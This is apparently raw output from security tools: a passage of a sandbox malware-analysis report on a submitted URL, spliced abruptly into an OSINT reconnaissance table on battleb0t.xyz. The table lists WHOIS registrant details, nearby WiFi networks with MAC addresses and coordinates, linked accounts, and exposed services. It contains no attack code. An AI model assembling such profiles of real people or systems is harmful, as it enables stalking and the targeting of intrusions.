[targetUID: 00000000-00004072]\n Dropped file: "A6NT0WYE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A6NT0WYE.txt]- [targetUID: 00000000-00004072]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabE754.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "CabED9F.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00002920]\n "_60BC7826-49A7-11ED-ADE6-080027C778EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "9FF67FB3141440EED32363089565AE60_33E6263BAF1D93C3B754E2140B85CB43" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_33E6263BAF1D93C3B754E2140B85CB43]- [targetUID: 00000000-00002920]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004072]\n 
"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002920]\n "RecoveryStore._29018067-49A7-11ED-ADE6-080027C778EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "WY7JZ84F.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WY7JZ84F.txt]- [targetUID: 00000000-00004072]\n "_29018069-49A7-11ED-ADE6-080027C778EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "swagger-ui-bundle_1_.js" has type "data"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00004072]\n "TarF0CC.tmp" has type "data"- Location: [%TEMP%\\TarF0CC.tmp]- [targetUID: 00000000-00002920]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00004072]\n "DDB0B468D23C74904993FA6E9CDC1988" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\DDB0B468D23C74904993FA6E9CDC1988]- [targetUID: 00000000-00002920]\n "~DF51DF99C6ABB698A3.TMP" has type "data"- Location: [%TEMP%\\~DF51DF99C6ABB698A3.TMP]- [targetUID: 00000000-00004072]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential 
URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://psti-dot-wearatar-dev.uc.r.appspot.com/docs"\n Pattern match: "http://psti-dot-wearatar-dev.uc.r.appspot.com"\n Heuristic match: "psti-dot-wearatar-dev.uc.r.appspot.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}], u'threat_level': 0, u'size': None, u'job_id': u'6345f449ab81ca2c01100ca1', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'142.250.191.84', u'104.16.86.20', u'34.74.170.74'], u'sha256': u'2a7999a7c7b888cb2de97ef77fd40b70d500bd4d0d867d53de57717906f536f9', u'sha512': u'9744da3e0ec5e27a8fbb50ae556122a5ad52cdcc373e630cd97ce77c0d58f82c30bb0fa88d846f8ccc580a46c53a0782d655599601f985d90f468df503e676f2', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/docs', u'submission_id': 
u'6345f449ab81ca2c01100ca2', u'created_at': u'2022-10-11T22:55:05+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-11T22:55:06+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 3, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section | 34.74.170.74 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ajansbegum (Net ID: 00:02:CF:87:A5:A4) | 40.2024, 29.0398 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 185.199.109.153 | www.battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_5.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:34:00 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif | https://funny.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0067ed.github.io | 185.199.111.153 |
| 2023-05-12 03:14:48 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | www.ayhu.xyz |
| 2023-05-12 02:54:34 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.64.0/20 | 104.21.71.14 |
| 2023-05-12 03:31:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | jrupp@name.com | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in the Name.com, Inc. WHOIS database is provided by Name.com, Inc. for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Name.com, Inc. does not guarantee its accuracy. Users accessing the Name.com, Inc. WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Name.com, Inc., except as reasonably necessary to register domain names or modify existing registrations. When using the Name.com, Inc. WHOIS service, please consider the following: the WHOIS service is not a replacement for standard EPP commands to the SRS service. WHOIS is not considered authoritative for registered domain objects. The WHOIS service may be scheduled for downtime during production or OT&E maintenance periods. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis, for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.name.com/layered-access-request . Name.com, Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | memrise (Category: hobby)
https://app.memrise.com/user/login/ | login |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f6059be52c402-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 02:45:43 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'San Francisco', u'security': {u'is_vpn': False}, u'city_geoname_id': 5391959, u'region_geoname_id': 5332921, u'country': u'United States', u'region': u'California', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'Fastly', u'organization_name': u'GitHub, Inc', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'94107', u'longitude': -122.3993, u'country_code': u'US', u'timezone': {u'abbreviation': u'PDT', u'gmt_offset': -7, u'is_dst': True, u'name': u'America/Los_Angeles', u'current_time': u'19:45:42'}, u'latitude': 37.7642, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'185.199.109.153', u'continent': u'North America', u'region_iso_code': u'CA'} | 185.199.109.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Yapitest (Net ID: 00:14:7C:B0:26:1A) | 40.2024, 29.0398 |
| 2023-05-12 02:56:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:44:09.315 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 16:44:09.312 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:11:15 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | London, England, W1B, United States, North America | 2a06:98c1:3121::1 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 188.114.96.1 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00d2.github.io]
https://www.openphish.com/feed.txt | 00d2.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:02:18) | 41.8781, -87.6298 |
| 2023-05-12 02:53:10 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | Cloudflare Inc. Cloudflare | vscode.battleb0t.xyz |
| 2023-05-12 02:54:48 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H0694HWAMG6RHJEVW16FQRHY"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 34.148.97.127 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BARWN-UnitedLayer01 (Net ID: 00:02:6F:01:86:4F) | 37.7642, -122.3993 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:03:05) | 50.8897, 6.0563 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | herron-libson (Net ID: 00:01:24:F1:75:B2) | 37.7813933,-122.3918002 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/ayshoo/ | ayshoo |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:8D:60) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://www.battleb0t.xyz | www.battleb0t.xyz |
| 2023-05-12 03:01:09 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.119): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://oldfluid.battleb0t.xyz | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D7:31) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:0C:41:86:BE:6A) | 32.8608, -79.9746 |
| 2023-05-12 02:44:56 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.111.153 |
| 2023-05-12 03:09:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | eliaspinheironeto.github.io |
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.218 | 104.196.30.220 |
| 2023-05-12 02:54:14 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://nwapi2.battleb0t.xyz | nwapi2.battleb0t.xyz |
| 2023-05-12 02:45:32 | Malicious Internet Name | Yes | VirusTotal | 0 | 0 | 1 | 0 | None | VirusTotal [ayhu.xyz]
https://www.virustotal.com/en/domain/ayhu.xyz/information/ | ayhu.xyz |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-to-1.github.io]
https://www.openphish.com/feed.txt | 0-to-1.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | azis (Net ID: 00:06:B1:15:73:DD) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.13): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:09 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 46.101.229.63 | 46.101.229.70 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LAB1234 (Net ID: 00:0C:41:CB:47:70) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-B772 (Net ID: 00:1D:CF:82:B7:70) | 32.8608, -79.9746 |
| 2023-05-12 03:01:12 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.127): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | linux | 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1100 (Net ID: 00:01:03:79:01:88) | 41.8781, -87.6298 |
| 2023-05-12 03:00:47 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.63): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-50B2 (Net ID: 90:1A:CA:7D:50:B0) | 37.751, -97.822 |
| 2023-05-12 03:14:28 | Similar Domain | Yes | TLD Searcher | 0 | 0 | 1 | 0 | None | battleb0t.ovh | battleb0t.xyz |
| 2023-05-12 02:53:49 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8000::153 |
| 2023-05-12 03:41:52 | Raw Data from RIRs | No | Censys | 1 | 0 | 3 | 0 | None | {"operating_system": {"vendor": "Microsoft", "product": "Windows", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "other": {"family": "Windows"}}, "last_updated_at": "2023-05-12T01:40:25.089Z", "ip": "45.131.109.53", "labels": ["file-sharing", "network-administration", "remote-access"], "location_updated_at": "2023-05-07T11:15:30.169008Z", "autonomous_system_updated_at": "2023-05-07T11:15:30.169132Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"vm.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-10T21:12:17.288943702Z"}, "11858-33959.pph-server.de": {"record_type": "A", "resolved_at": "2023-04-29T16:38:25.585351786Z"}, "wakapi.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-29T14:27:35.242336552Z"}, "www.tt-dev.de": {"record_type": "CNAME", "resolved_at": "2023-01-05T14:36:51.431345945Z"}, "traefik.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-07T14:38:59.772471404Z"}, "tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-31T14:50:50.814184504Z"}, "test.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-21T14:29:05.064783690Z"}, "wiki.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-08T14:20:13.917172001Z"}, "grafana.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-01T14:18:17.398732703Z"}, "70724-04381.pph-server.de": {"record_type": "A", "resolved_at": "2023-04-20T20:07:07.842037289Z"}, "npm.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-21T14:29:04.915388971Z"}, "portainer.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-14T14:32:52.020207987Z"}, "ci.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-06T14:26:38.984649398Z"}}, "names": 
["traefik.tt-dev.de", "npm.tt-dev.de", "vm.battleb0t.xyz", "wakapi.tt-dev.de", "portainer.tt-dev.de", "ci.tt-dev.de", "tt-dev.de", "grafana.tt-dev.de", "test.tt-dev.de", "www.tt-dev.de", "wiki.tt-dev.de", "70724-04381.pph-server.de", "11858-33959.pph-server.de"], "reverse_dns": {"resolved_at": "2023-05-04T16:22:43.166057588Z", "names": ["vm.battleb0t.xyz"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["file-sharing"], "truncated": false, "service_name": "SMB", "_decoded": "smb", "banner_hashes": ["sha256:51d9f41a595c653b76dbff0adeec37710decd99e91825ba2de9ef6e273bfcaf0"], "source_ip": "162.142.125.225", "extended_service_name": "SMB", "smb": {"smbv1_support": false, "negotiation_log": {"security_mode": 1, "system_time": 1683815217, "server_start_time": 1240428288, "_encoding": {"server_guid": "DISPLAY_HEX"}, "capabilities": 7, "server_guid": "0000000000000000000000000000000031a109594c6a1d49a3303a66d4c26ecb", "dialect_revision": 528, "authentication_types": ["1.3.6.1.4.1.311.2.2.30", "1.3.6.1.4.1.311.2.2.10"], "header_log": {"status": 0, "_encoding": {"protocol_id": "DISPLAY_HEX"}, "protocol_id": "00000000fe534d42", "credits": 1, "flags": 1, "command": 0}}, "smb_version": {"major": 2, "version_string": "SMB 2.1", "minor": 1, "revision": 0}, "session_setup_log": {"target_name": "70724-04381", "setup_flags": 0, "header_log": {"status": 3221225494, "_encoding": {"protocol_id": "DISPLAY_HEX"}, "protocol_id": "00000000fe534d42", "credits": 1, "command": 1, "flags": 1}, "negotiate_flags": 2726953477}, "smb_capabilities": {"smb_multicredit_support": true, "smb_persistent_handle_support": false, "smb_dfs_support": true, "smb_leasing_support": true, "smb_encryption_support": false, "smb_directory_leasing_support": false, "smb_multichan_support": false}, "has_ntlm": true}, "observed_at": "2023-05-11T14:26:57.515685601Z", "banner_hex": "534d4220534d4220322e31", "perspective_id": "PERSPECTIVE_HE", 
